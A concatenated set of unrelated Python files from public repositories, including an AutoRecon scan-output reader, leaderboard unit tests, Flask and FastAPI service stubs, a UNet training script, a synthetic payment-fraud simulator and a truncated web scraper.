in scansDir:\n if \"feroxbuster.txt\" in things:\n print(\"\\n\\n\")\n logging.info(\"Grabbing feroxbuster information\\n\")\n for ferox in scansDir:\n if \"feroxbuster.txt\" in ferox:\n f = open(\"scans/{}\".format(ferox), \"r\")\n file = f.readlines()\n for line in file:\n directory = re.findall(\"(\\d+).+?\\d+\\w+\\s+\\d+\\w+\\s+(http.+)\",line)\n smallDir = re.findall(\".+/(.+)$\",str(directory[0][1]))\n logging.info(\"Directory Found: {}\".format(smallDir[0]))\n logging.info(\"Whole URL: {}\\n\".format(directory[0][1]))\n\n feroxbusterAll[smallDir[0]] = {\"dir\": smallDir[0], \"url\": directory[0][1], \"status_code\":directory[0][0]}\n # print(line)\n f.close()\n else:\n pass\n\n if \"http_index.html\" in things:\n print(\"\\n\\n\")\n logging.info(\"Looking for comments in index.html\\n\")\n for index in scansDir:\n if \"http_index.html\" in index:\n f = open(\"scans/{}\".format(index), \"r\")\n file = f.readlines()\n for line in file:\n comment = re.findall(\"(\\<\\!\\-\\-.+?\\-\\-\\>)\",line)\n if comment:\n commentAll.append(comment)\n print(comment)\n f.close()\n\n\n if \"robots.txt\" in things:\n print(\"\\n\\n\")\n logging.info(\"Looking for robots.txt\\n\")\n for index in scansDir:\n if \"robots.txt\" in index:\n f = open(\"scans/{}\".format(index), \"r\")\n file = f.readlines()\n for line in file:\n comment = re.findall(\"HTTP\\/1\\.\\d{1}\\s+(\\d{3})\",line)\n if comment:\n status = re.findall(\"(40\\d|50\\d)\",comment[0])\n if status:\n logging.info(\"Robots.txt page not found\")\n else:\n logging.info(\"Robots.txt page found. Please check\")\n robot = True\n\n f.close()\n\n\n\n logging.debug(versionsAll)\n logging.debug(feroxbusterAll)\n logging.debug(commentAll)\n logging.debug(\"Robots.txt page found: {}\".format(robot))\n\ndef main():\n print(\"Whats up!\")\n\n curdir = os.listdir()\n if \"report\" in curdir and \"exploit\" in curdir and \"loot\" in curdir and \"scans\" in curdir:\n logging.debug(\"We in it\")\n checks()\n else:\n logging.fatal(\"Please put me in the directory that has AutoRecon's output. I can not find it here.... \\nCurrent Location: {}\".format(os.getcwd()))\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"sparky23172/WOPR_and_friends","sub_path":"AutoReconReader/AutoReconReport.py","file_name":"AutoReconReport.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38911549590","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport os\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nimport pytest\n\nimport pandas as pd\n\nfrom rampwf.utils.command_line import create_ramp_test_submission_parser\nfrom rampwf.utils.command_line import create_ramp_test_notebook_parser\nfrom rampwf.utils.command_line import _get_metrics\nfrom rampwf.utils.command_line import _build_leaderboard_df\nfrom rampwf.utils.command_line import _filter_and_sort_leaderboard_df\nfrom rampwf.utils.command_line import _build_scores_dict\n\n\ndef test_cmd_ramp_test_submission_parser():\n\n # defaults\n parser = create_ramp_test_submission_parser()\n args = parser.parse_args([])\n assert args.ramp_kit_dir == '.'\n assert args.ramp_data_dir == '.'\n assert args.ramp_submission_dir == 'submissions'\n assert args.submission == 'starting_kit'\n\n # specifying keyword args\n parser = create_ramp_test_submission_parser()\n args = parser.parse_args([\n '--ramp_kit_dir', './titanic/', '--ramp_data_dir', './titanic/',\n '--ramp_submission_dir', './titanic', '--submission', 'other'])\n assert args.ramp_kit_dir == './titanic/'\n assert args.ramp_data_dir == './titanic/'\n assert args.ramp_submission_dir == './titanic'\n assert args.submission == 'other'\n\n\ndef test_cmd_ramp_test_notebook_parser():\n\n # defaults\n parser = create_ramp_test_notebook_parser()\n args = parser.parse_args([])\n assert args.ramp_kit_dir == '.'\n\n # specifying keyword args\n parser = create_ramp_test_notebook_parser()\n args = parser.parse_args(['--ramp_kit_dir', './titanic/'])\n assert args.ramp_kit_dir == './titanic/'\n\n\ndef test_cmd_ramp_leaderboard_build_scores_dict():\n with TemporaryDirectory() as tmpdirname:\n # case where 'submissions' folder does not exit\n with pytest.raises(OSError):\n _build_scores_dict(tmpdirname)\n\n # case where 'submissions' folder exists but no scores\n # are available\n\n os.mkdir(os.path.join(tmpdirname, 'submissions'))\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 0\n training_output = os.path.join(\n tmpdirname, 'submissions', '{sub}', 'training_output')\n os.makedirs(training_output.format(sub='s1'))\n os.makedirs(training_output.format(sub='s2'))\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 0\n\n os.makedirs(os.path.join(training_output, 'fold_0').format(sub='s1'))\n os.makedirs(os.path.join(training_output, 'fold_0').format(sub='s2'))\n\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 0\n\n scores_content = [\n \"step,acc,nll\",\n \"train,0.57,1.17\",\n \"valid,0.65,0.52\",\n \"test,0.70,0.80\"\n ]\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s1')\n # case where scores.csv file is empty\n with open(f, 'w') as fd:\n pass\n with pytest.raises(pd.errors.EmptyDataError):\n _build_scores_dict(tmpdirname)\n\n with open(f, 'w') as fd:\n fd.write(scores_content[0] + '\\n')\n\n # case where all steps are missing in the scores.csv file\n with pytest.raises(AssertionError):\n _build_scores_dict(tmpdirname)\n\n # case where some step is missing in the scores.csv file\n with open(f, 'w') as fd:\n fd.write(scores_content[0] + '\\n')\n fd.write(scores_content[1] + '\\n')\n with pytest.raises(AssertionError):\n _build_scores_dict(tmpdirname)\n # case where everything is fine in scores.csv file\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores_content))\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 1\n assert list(scores.keys()) == ['s1']\n assert scores['s1'][0]['acc'] == {\n 'train': 0.57, 'valid': 0.65, 'test': 0.7}\n assert scores['s1'][0]['nll'] == {\n 'train': 1.17, 'valid': 0.52, 'test': 0.80}\n # case of two submissions that are ok\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s2')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores_content))\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 2\n assert set(scores.keys()) == set(['s1', 's2'])\n assert scores['s1'][0]['acc'] == {\n 'train': 0.57, 'valid': 0.65, 'test': 0.7}\n assert scores['s1'][0]['nll'] == {\n 'train': 1.17, 'valid': 0.52, 'test': 0.80}\n assert scores['s2'][0]['acc'] == {\n 'train': 0.57, 'valid': 0.65, 'test': 0.7}\n assert scores['s2'][0]['nll'] == {\n 'train': 1.17, 'valid': 0.52, 'test': 0.80}\n # case of two submissions with inconsistent metrics\n scores1_content = [\n \"step,acc,nll\",\n \"train,0.57,1.17\",\n \"valid,0.65,0.52\",\n \"test,0.70,0.80\"\n ]\n scores2_content = [\n \"step,acc\",\n \"train,0.57\",\n \"valid,0.65\",\n \"test,0.70\"\n ]\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s1')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores1_content))\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s2')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores2_content))\n with pytest.raises(AssertionError):\n _build_scores_dict(tmpdirname)\n # case of two submissions with inconsistent nb of folds\n os.makedirs(os.path.join(training_output, 'fold_1').format(sub='s1'))\n f = os.path.join(\n training_output,\n 'fold_1', 'scores.csv').format(sub='s1')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores1_content))\n\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s2')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores1_content))\n with pytest.raises(AssertionError):\n _build_scores_dict(tmpdirname)\n # case of two submissions, with two folds that are fine\n os.makedirs(os.path.join(training_output, 'fold_1').format(sub='s2'))\n\n s1f0 = [\n \"step,acc,nll\",\n \"train,0.1,1\",\n \"valid,0.2,2\",\n \"test,0.3,3\"\n ]\n s1f1 = [\n \"step,acc,nll\",\n \"train,0.4,4\",\n \"valid,0.5,5\",\n \"test,0.6,6\"\n ]\n s2f0 = [\n \"step,acc,nll\",\n \"train,0.7,7\",\n \"valid,0.8,8\",\n \"test,0.9,9\"\n ]\n s2f1 = [\n \"step,acc,nll\",\n \"train,0.1,1\",\n \"valid,0.2,2\",\n \"test,0.3,3\"\n ]\n scs = {'s1': {'fold_0': s1f0, 'fold_1': s1f1},\n 's2': {'fold_0': s2f0, 'fold_1': s2f1}}\n for sub in ('s1', 's2'):\n for fold in ('fold_0', 'fold_1'):\n f = os.path.join(training_output, fold, 'scores.csv').format(\n sub=sub)\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scs[sub][fold]))\n scores = _build_scores_dict(tmpdirname)\n expected_scores = {\n 's1': {\n 0: {\n 'acc': {'train': 0.1, 'valid': 0.2, 'test': 0.3},\n 'nll': {'train': 1, 'valid': 2, 'test': 3},\n },\n 1: {\n 'acc': {'train': 0.4, 'valid': 0.5, 'test': 0.6},\n 'nll': {'train': 4, 'valid': 5, 'test': 6},\n }\n },\n 's2': {\n 0: {\n 'acc': {'train': 0.7, 'valid': 0.8, 'test': 0.9},\n 'nll': {'train': 7, 'valid': 8, 'test': 9},\n },\n 1: {\n 'acc': {'train': 0.1, 'valid': 0.2, 'test': 0.3},\n 'nll': {'train': 1, 'valid': 2, 'test': 3},\n },\n }\n }\n assert scores == expected_scores\n\n\nclass TemporaryDirectory(object):\n\n def __enter__(self):\n self.tmpdirname = mkdtemp()\n return self.tmpdirname\n\n def __exit__(self, *exc):\n rmtree(self.tmpdirname)\n\n\ndef test_cmd_ramp_leaderboard_build_leaderboard_df():\n scores_dict = {\n 'submission1': {\n 0: {\n 'acc': {'train': 0.7, 'valid': 0.3, 'test': 0.1},\n 'nll': {'train': 1.3, 'valid': 1.4, 'test': 1.5},\n },\n 1: {\n 'acc': {'train': 0.8, 'valid': 0.5, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.6, 'test': 1.6},\n }\n },\n 'submission2': {\n 0: {\n 'acc': {'train': 0.4, 'valid': 0.7, 'test': 0.2},\n 'nll': {'train': 1.1, 'valid': 1.9, 'test': 1.2},\n },\n 1: {\n 'acc': {'train': 0.3, 'valid': 0.3, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.0, 'test': 1.1},\n },\n }\n }\n\n leaderboard_df = _build_leaderboard_df(scores_dict, precision=2)\n assert set(leaderboard_df.columns) == set([\n 'submission',\n 'train_acc', 'valid_acc', 'test_acc',\n 'train_acc_mean', 'valid_acc_mean', 'test_acc_mean',\n 'train_acc_std', 'valid_acc_std', 'test_acc_std',\n\n 'train_nll', 'valid_nll', 'test_nll',\n 'train_nll_mean', 'valid_nll_mean', 'test_nll_mean',\n 'train_nll_std', 'valid_nll_std', 'test_nll_std',\n ])\n assert (set(leaderboard_df['submission']) ==\n set(['submission1', 'submission2']))\n\n d = leaderboard_df.set_index('submission').to_dict(orient='index')\n assert d['submission1']['valid_acc'] == '0.40 ± 0.100'\n assert d['submission1']['test_acc'] == '0.25 ± 0.150'\n assert d['submission1']['train_nll'] == '1.25 ± 0.050'\n assert d['submission1']['valid_nll'] == '1.50 ± 0.100'\n assert d['submission1']['test_nll'] == '1.55 ± 0.050'\n assert d['submission1']['train_acc_mean'] == '0.75'\n assert d['submission1']['train_acc_std'] == '0.050'\n assert d['submission1']['valid_acc_mean'] == '0.40'\n assert d['submission1']['valid_acc_std'] == '0.100'\n assert d['submission1']['test_acc_mean'] == '0.25'\n assert d['submission1']['test_acc_std'] == '0.150'\n assert d['submission1']['train_nll_mean'] == '1.25'\n assert d['submission1']['train_nll_std'] == '0.050'\n assert d['submission1']['valid_nll_mean'] == '1.50'\n assert d['submission1']['valid_nll_std'] == '0.100'\n assert d['submission1']['test_nll_mean'] == '1.55'\n assert d['submission1']['test_nll_std'] == '0.050'\n assert d['submission2']['train_acc'] == '0.35 ± 0.050'\n assert d['submission2']['valid_acc'] == '0.50 ± 0.200'\n assert d['submission2']['test_acc'] == '0.30 ± 0.100'\n assert d['submission2']['train_nll'] == '1.15 ± 0.050'\n assert d['submission2']['valid_nll'] == '1.45 ± 0.450'\n assert d['submission2']['test_nll'] == '1.15 ± 0.050'\n assert d['submission2']['train_acc_mean'] == '0.35'\n assert d['submission2']['train_acc_std'] == '0.050'\n assert d['submission2']['valid_acc_mean'] == '0.50'\n assert d['submission2']['valid_acc_std'] == '0.200'\n assert d['submission2']['test_acc_mean'] == '0.30'\n assert d['submission2']['test_acc_std'] == '0.100'\n assert d['submission2']['train_nll_mean'] == '1.15'\n assert d['submission2']['train_nll_std'] == '0.050'\n assert d['submission2']['valid_nll_mean'] == '1.45'\n assert d['submission2']['valid_nll_std'] == '0.450'\n assert d['submission2']['test_nll_mean'] == '1.15'\n assert d['submission2']['test_nll_std'] == '0.050'\n\n\ndef test_cmd_ramp_leaderboard_filter_sort_leaderboard_df():\n scores_dict = {\n 'submission1': {\n 0: {\n 'acc': {'train': 0.7, 'valid': 0.3, 'test': 0.1},\n 'nll': {'train': 1.3, 'valid': 1.4, 'test': 1.5},\n },\n 1: {\n 'acc': {'train': 0.8, 'valid': 0.5, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.6, 'test': 1.6},\n }\n },\n 'submission2': {\n 0: {\n 'acc': {'train': 0.4, 'valid': 0.7, 'test': 0.2},\n 'nll': {'train': 1.1, 'valid': 1.9, 'test': 1.2},\n },\n 1: {\n 'acc': {'train': 0.3, 'valid': 0.3, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.0, 'test': 1.1},\n },\n }\n }\n df = _build_leaderboard_df(scores_dict)\n # by default use train_metric/valid_metric/test_metric\n # of the metric first in alphabetical order ('acc' here)\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=None)\n assert df_.columns.tolist() == [\n 'submission', 'train_acc', 'valid_acc', 'test_acc']\n # non existent column\n with pytest.raises(ValueError):\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=['abc'],\n metric=None,\n sort_by=None)\n # no columns\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=[],\n metric=None,\n sort_by=None)\n assert df_.columns.tolist() == ['submission']\n\n # some cols\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=['train_nll', 'valid_acc'],\n metric=None,\n sort_by=None)\n assert df_.columns.tolist() == ['submission', 'train_nll', 'valid_acc']\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=['valid_acc', 'train_nll'],\n metric=None,\n sort_by=None)\n assert df_.columns.tolist() == ['submission', 'valid_acc', 'train_nll']\n # giving both a metric and cols\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=['valid_acc', 'train_nll'],\n metric='acc',\n sort_by=None)\n assert df_ is None\n\n # non existent metric\n with pytest.raises(ValueError):\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric='accc',\n sort_by=None)\n # giving metric\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric='nll',\n sort_by=None)\n assert df_.columns.tolist() == [\n 'submission', 'train_nll', 'valid_nll', 'test_nll']\n # sorting by non existent col\n with pytest.raises(ValueError):\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=['abc'])\n # sorting by col\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=['test_nll_mean'],\n asc=True)\n assert df_['submission'].tolist() == ['submission2', 'submission1']\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=['test_nll_mean'],\n asc=False)\n assert df_['submission'].tolist() == ['submission1', 'submission2']\n\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=['train_acc_mean'],\n asc=False)\n assert df_['submission'].tolist() == ['submission1', 'submission2']\n\n\ndef test_cmd_ramp_leaderboard_get_metrics():\n assert _get_metrics(_build_leaderboard_df({})) == []\n scores_dict = {\n 'submission1': {\n 0: {\n 'acc': {'train': 0.7, 'valid': 0.3, 'test': 0.1},\n 'nll': {'train': 1.3, 'valid': 1.4, 'test': 1.5},\n },\n 1: {\n 'acc': {'train': 0.8, 'valid': 0.5, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.6, 'test': 1.6},\n }\n },\n 'submission2': {\n 0: {\n 'acc': {'train': 0.4, 'valid': 0.7, 'test': 0.2},\n 'nll': {'train': 1.1, 'valid': 1.9, 'test': 1.2},\n },\n 1: {\n 'acc': {'train': 0.3, 'valid': 0.3, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.0, 'test': 1.1},\n },\n }\n }\n df = _build_leaderboard_df(scores_dict)\n assert set(_get_metrics(df)) == set(['acc', 'nll'])\n","repo_name":"gregoire-colin/ramp_workflow","sub_path":"rampwf/utils/tests/test_command_line.py","file_name":"test_command_line.py","file_ext":"py","file_size_in_byte":16402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32448558187","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\n\nimport logging\nfrom json import dumps\n\nfrom flask import request\n\nlogger = logging.getLogger('plutil.http.s')\n\n\ndef define_common_routes(plugin, app, server):\n \"\"\" Some routes are always defined. \"\"\"\n\n @app.route('/', methods=['GET', 'POST'])\n def route_index():\n logger.debug(\"Server reached on root path\")\n\n the_args = request.args\n for arg in the_args:\n logger.debug(\" - argument %s: %s\", (arg, the_args[arg]))\n\n return dumps({\n 'status': 'OK',\n 'result': the_args\n })\n\n @app.route('/shut_me_down_used_for_restarts', methods=['POST'])\n def route_shutdown():\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n return dumps({\n 'status': 'OK',\n 'result': \"Shutting down...\"\n })\n\n @app.route('/result', methods=['GET', 'POST'])\n def route_result():\n logger.debug(\"We're being asked about a result\")\n\n try:\n message_id = str(request.args['id'])\n with server.messages_lock:\n if message_id in server.messages:\n logger.debug(\"message %r found in queue\", message_id)\n message = server.messages[message_id]\n del server.messages[message_id]\n result_type = message.result_type\n result_data = message.result_data\n else:\n logger.debug(\"message %r NOT found in queue\", message_id)\n result_type = 'NotFound'\n result_data = 'Result may not be ready or it ' \\\n 'might have expired'\n except Exception:\n result_data = 'Exception in server while attempting to reply'\n result_type = 'Error'\n logger.error(result_data, exc_info=True)\n\n return dumps({\n 'status': result_type,\n 'result': result_data\n })\n","repo_name":"pyqgis/plutil","sub_path":"qgis_plutil/http_server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41990797781","text":"import fastapi_jsonrpc as jsonrpc\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom loguru import logger\nfrom app.errors import *\nfrom app.library import Library\n\n# JSON-RPC entrypoint\napi_v1 = jsonrpc.Entrypoint(\"/v1\")\n\n# Server singletons: database, queue and library handler\nqueue = Library(\"redis\")\n# RPC Methods\n\n\n@api_v1.method(errors=[])\ndef allocation() -> dict:\n \"\"\"Get assigned a start for your brick of TMs to compute and submit\"\"\"\n logger.info(\"allocation requested \")\n\n\n@api_v1.method(errors=[])\ndef submission(client: str, start_tm: int, result_map: dict) -> dict:\n \"\"\"Submit your TM results for an allocated compute task\"\"\"\n logger.info(\"submission made for {} \", start_tm)\n\n\n@api_v1.method()\ndef network() -> dict:\n \"\"\"Gets the latest volunteer network information\"\"\"\n results = {\n \"latest_turing_space\": 3,\n \"total_clients\": 112,\n \"automacoin_supply\": 10000,\n \"brick_size\": 500,\n }\n return results\n\n\n# entrypoint: ./api/v1/... methods=account, allocation, network\napp = jsonrpc.API()\napp.bind_entrypoint(api_v1)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# configure logger session\n@app.on_event(\"startup\")\nasync def startup():\n logger.add(\"file_{time}.log\")\n logger.info(\"Service is Spinning Up\")\n logger.info(\"Starting tape store...\")\n\n\n# Dump the logs if a shutdown is occuring.\n@app.on_event(\"shutdown\")\nasync def shutdown():\n # ideally you'd put this backup in a docker volume, S3 or Grafana-compatible store.\n logger.info(\"Service is Shutting Down\")\n\n\nif __name__ == \"__main__\":\n import uvicorn\n\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=5000, debug=True, access_log=False)\n","repo_name":"automacoin/Foreman","sub_path":"src/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"73063780807","text":"from UNetDataset import UNetDataset\nfrom Unet2d import UNet\nfrom torch.utils.data import Dataset, DataLoader\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.optim as optim\nimport smtplib, ssl\n\n# IXI dataset path\nMNI_data_path = '/Users/gabriellakamlish/BrainResection/IXI/IXI_MNI'\nIXI_dataset = UNetDataset(MNI_data_path)\n\ndataloader = DataLoader(IXI_dataset, batch_size=5,shuffle=True, num_workers=0)\n\nneural_net = UNet()\n\ncriterion = nn.MSELoss()\noptimizer = optim.Adam(neural_net.parameters(), lr=0.001)\n\ntraining_iterations = 1\n\nfor epoch in range(training_iterations): # loop over the dataset multiple times\n\n running_loss = 0.0\n for i, data in enumerate(dataloader, 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, labels = data\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n print(inputs.dtype)\n\n inputs = inputs.float()\n print(inputs.dtype)\n outputs = neural_net(inputs)\n print(outputs.dtype)\n loss = criterion(outputs, labels)\n\n loss.backward()\n optimizer.step()\n\n # print statistics\n running_loss += loss.item()\n if i % 5 == 4: # print every 10 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 10))\n running_loss = 0.0\n\nprint('Finished Training')\n\n","repo_name":"GabriellaKamlish/BrainResection","sub_path":"Inpainting2D/UNetTraining2D.py","file_name":"UNetTraining2D.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11806361589","text":"from loader import load\nfrom collections import Counter\n\n\ndef prepass(fname):\n duration, intersections, streets, cars, bonus = load(fname)\n\n res = []\n\n for street in streets:\n res.append(street[\"name\"])\n\n for car in cars:\n for street in car['path']:\n res.append(street)\n\n return dict(Counter(res))\n\n\ndef snapshot(fname):\n duration, intersections, streets, cars, bonus = load(fname)\n\n res = {}\n for street in streets:\n res[street['name']] = 0\n\n for car in cars:\n res[car['path'][0]] += 1\n\n return res\n\n\ndef restriction(streets, cars, start_time=0, end_time=100):\n times = {s[\"name\"]: s[\"time\"] for s in streets}\n car_timestamps = []\n for car in cars:\n current_time = 0\n car_timestamps.append({})\n for i in range(len(car[\"path\"])):\n if i >= 1:\n current_time += times[car[\"path\"][i]]\n car_timestamps[-1][current_time] = car[\"path\"][i] \n \n for i in range(len(car_timestamps)):\n car_timestamps[i] = {k: v for k, v in car_timestamps[i].items() if start_time < k < end_time}\n \n return car_timestamps\n\nif __name__ == '__main__':\n duration, intersections, streets, cars, bonus = load(\"a\")\n print(restriction(streets, cars, 0, 6))\n","repo_name":"liukidar/hashcode2021","sub_path":"prepass.py","file_name":"prepass.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33588962168","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 29 11:54:54 2020\r\n\r\n@author: Henry Yang\r\n\"\"\"\r\n\r\nclass Solution(object):\r\n def strStr(self, haystack, needle):\r\n \"\"\"\r\n :type haystack: str\r\n :type needle: str\r\n :rtype: int\r\n \"\"\"\r\n i = 0\r\n if needle == \"\" or haystack == needle:\r\n return 0\r\n else:\r\n while i < len(haystack) - len(needle) + 1:\r\n if haystack[i] == needle[0]:\r\n if haystack[i:i+len(needle)] == needle:\r\n return i\r\n i += 1\r\n return -1","repo_name":"k65yang/general_code","sub_path":"Leetcode/Python/12-29.py","file_name":"12-29.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12124099099","text":"import os\nimport random\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport datetime\nsns.set_style('whitegrid', {'axes.facecolor': '1'})\n\n# ----------------------------------------------------------------------\ndef Simulate_customer_profile_df(n_customers, random_state=66):\n np.random.seed(random_state)\n customer_id_property=[]\n # Generate customer location from uniform distributions \n for customer_id in range(n_customers):\n x_customer_id = np.random.uniform(0,100)\n y_customer_id = np.random.uniform(0,100)\n mean_amount = np.random.uniform(10,100) \n std_amount = mean_amount/2.5 \n mean_trans_per_day = np.random.uniform(0,5) # mean transactions nearby per day \n customer_id_property.append([customer_id,\n x_customer_id, y_customer_id,\n mean_amount, std_amount,\n mean_trans_per_day])\n customer_profiles_df = pd.DataFrame(customer_id_property, columns=['CUSTOMER_ID',\n 'location_x', 'location_y',\n 'Mean_trans', 'STD_trans',\n 'num_tran_day'])\n return customer_profiles_df\n\n# ----------------------------------------------------------------------\ndef Simulate_station_profiles_df(n_stations, random_state=66):\n np.random.seed(random_state)\n station_id_property=[]\n # Generate station locations from uniform distributions \n for store_id in range(n_stations):\n x_station_id = np.random.uniform(0,100)\n y_station_id = np.random.uniform(0,100)\n station_id_property.append([store_id,\n x_station_id, y_station_id]) \n station_profiles_df = pd.DataFrame(station_id_property, columns=['STORE_ID',\n 'Station_location_x', 'Station_location_y'])\n return station_profiles_df\n\n# ----------------------------------------------------------------------\ndef station_within_radius(customer_profile,x_y_stations, r):\n x_y_customer = customer_profile[['location_x','location_y']].values.astype(float)\n # Root of sum of squared difference\n squared_diff = np.square(x_y_customer - x_y_stations)\n # compute suared root to get distance\n dist = np.sqrt(np.sum(squared_diff, axis=1))\n # Get the indices of terminals which are at a distance within r\n available_stations = list(np.where(dist0:\n for trans in range(nb_trans):\n # We are trying to assume that most transactions happen during daytime\n time_trans = int(np.random.normal(86400/2, 20000))\n # We have at most 24 hours for a single day\n if (time_trans>0) and (time_trans<86400):\n # Transaction amount is drawn from a normal distribution \n amount = np.random.normal(customer_profile.Mean_trans,customer_profile.STD_trans)\n # If amount negative, we resample from a uniform distribution\n if amount<0:\n amount = np.random.uniform(0,customer_profile.Mean_trans*2)\n amount=np.round(amount,decimals=2)\n #Transactions need to happen at available stations.\n if len(customer_profile.available_stations)>0:\n store_id = random.choice(customer_profile.available_stations)\n customer_transactions.append([time_trans+day*86400, day,customer_profile.CUSTOMER_ID, store_id, amount])\n #We combine the all of the columns together.\n customer_transactions = pd.DataFrame(customer_transactions, columns=['Trans_TIME_SECONDS', 'Trans_TIME_DAYS', 'CUSTOMER_ID', 'STORE_ID', 'Trans_AMOUNT'])\n if len(customer_transactions)>0:\n customer_transactions['Trans_DATETIME'] = pd.to_datetime(customer_transactions[\"Trans_TIME_SECONDS\"], unit='s', origin=start_date)\n customer_transactions=customer_transactions[['Trans_DATETIME','CUSTOMER_ID', 'STORE_ID', 'Trans_AMOUNT','Trans_TIME_SECONDS', 'Trans_TIME_DAYS']]\n return customer_transactions \n\n# ----------------------------------------------------------------------\n#Go through the previous process all together.\ndef Simulate_dataset(n_customers = 10000, n_stations = 1000000, nb_days=90, start_date=\"2022-01-01\", r=7):\n customer_profiles_df = Simulate_customer_profile_df(n_customers, random_state = 3)\n station_profiles_df = Simulate_station_profiles_df(n_stations, random_state = 33)\n x_y_stations = station_profiles_df[['Station_location_x','Station_location_y']].values.astype(float)\n customer_profiles_df['available_stations'] = customer_profiles_df.apply(lambda x : station_within_radius(x, x_y_stations=x_y_stations, r=r), axis=1)\n customer_profiles_df['nb_stations']=customer_profiles_df.available_stations.apply(len)\n transactions_df=customer_profiles_df.groupby('CUSTOMER_ID').apply(lambda x : Simulate_transactions_df(x.iloc[0], nb_days=nb_days)).reset_index(drop=True)\n transactions_df=transactions_df.sort_values('Trans_DATETIME')\n transactions_df.reset_index(inplace=True,drop=True)\n transactions_df.reset_index(inplace=True)\n transactions_df.rename(columns = {'index':'TRANSACTION_ID'}, inplace = True)\n return (customer_profiles_df, station_profiles_df, transactions_df)\n\n# ----------------------------------------------------------------------\ndef Simulate_frauds(customer_profiles_df, station_profiles_df, transactions_df):\n transactions_df['Trans_FRAUD']=0\n #Transaction amount greater than 190 is considered fraud.\n transactions_df.loc[transactions_df.Trans_AMOUNT>190, 'Trans_FRAUD']=1\n #9 stations are frauds.\n for day in range(transactions_df.Trans_TIME_DAYS.max()):\n fraud_stations = station_profiles_df.STORE_ID.sample(n=9, random_state=day)\n fraud_transactions=transactions_df[(transactions_df.Trans_TIME_DAYS>=day) & (transactions_df.Trans_TIME_DAYS=day) & (transactions_df.Trans_TIME_DAYS[\\s]+(.*?)[\\s]+', res_href.text)[0] # 翻找数据存储网址并使用正则解析\r\n result = html.unescape(htmls.encode('utf-8').decode('unicode-escape')) # 整理转义字符并将unicode编码转为utf-8\r\n json_text = json.loads(result) # json解析\r\n if list.split('/')[-5]=='2885':\r\n href_id = [i['taskId'] for i in json_text if i['taskId'].startswith('7')] # 提取json字符串中的目标id并筛选\r\n else:\r\n href_id = [i['taskId'] for i in json_text if 